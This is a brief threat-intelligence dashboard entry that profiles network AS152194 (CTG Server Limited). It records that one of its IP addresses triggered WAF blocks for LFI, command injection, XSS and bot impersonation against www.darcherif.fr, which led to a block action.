Investigation Workspace

Entity: AS152194 (Asn)

Entity Details
Type: Asn
ASN: AS152194 - CTG Server Limited
Threat Intelligence
Associated with IP 134.122.136.96, which triggered multiple critical WAF deny rules including LFI, command injection, XSS, and bot impersonation. All accessed paths from this ASN were flagged as malicious.
Linked Entities
TLS Fingerprints (1)
Hostnames Targeted
Hostname Request Count
www.darcherif.fr 179
Paths Targeted (with Hostname Counts)

Block

2025-11-30 14:03:57